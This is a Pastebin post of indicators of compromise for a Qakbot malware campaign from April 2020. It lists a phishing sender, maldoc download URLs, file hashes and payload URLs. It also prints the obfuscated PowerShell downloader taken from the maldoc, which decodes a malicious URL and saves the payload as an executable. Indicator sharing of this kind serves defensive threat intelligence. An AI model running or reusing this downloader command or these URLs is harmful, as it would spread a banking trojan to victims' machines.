API tools faq
paste
ExecuteMalware

2020-04-07 Qakbot IOCs

ExecuteMalware
Apr 7th, 2020
2,500
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.30 KB | None | 0 0
raw download clone embed print report
  1. QAKBOT IOCs
  2.  
  3. SENDERS OBSERVED
  4. Abrar Kazmi <[email protected]>
  5.  
  6. MALDOC DISTRIBUTION URLS
  7. http://almohadonera.clichead.club/slider/7609639.zip
  8. http://bienkich.edu.vn/slider/81828.zip
  9. http://hashiniagrotech.com/wp-content/uploads/2020/04/slider/5188.zip
  10. http://zumtellerrand.de/slider/9902.zip
  11. https://anandtradingcompany.in/wp-content/uploads/2020/04/slider/0916332/0916332.zip
  12. https://grieche.apptec24.com/slider/4375/4375.zip
  13. https://jtechsolutionspk.com/wp-content/uploads/2020/04/slider/25093473/25093473.zip
  14.  
  15. ZIP FILE HASH
  16. 381c6f4adac6e4070e77004be6033ba4
  17.  
  18. DOCUMENT FILE HASH
  19. e2200f54024d7f25d9ef67d172d59387
  20.  
  21. POWERSHELL FROM MALDOC
  22. cmd /c powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL3JldHJvYmFuZC51ay93cC1jb250ZW50L3VwbG9hZHMvMjAyMC8wNC9zbGlkZXIvNDQ0NDQ0LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt 2>&1
  23.  
  24. QAKBOT PAYLOAD
  25. http://retroband.uk/wp-content/uploads/2020/04/slider/444444.png
  26. http://wppunk.com/wp-content/uploads/2020/04/slider/444444.png
  27. http://kramo.pl/wp-content/plugins/apikey/slider/444444.png
  28. http://b.assignmentproff.com/amyceyaihd.png
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!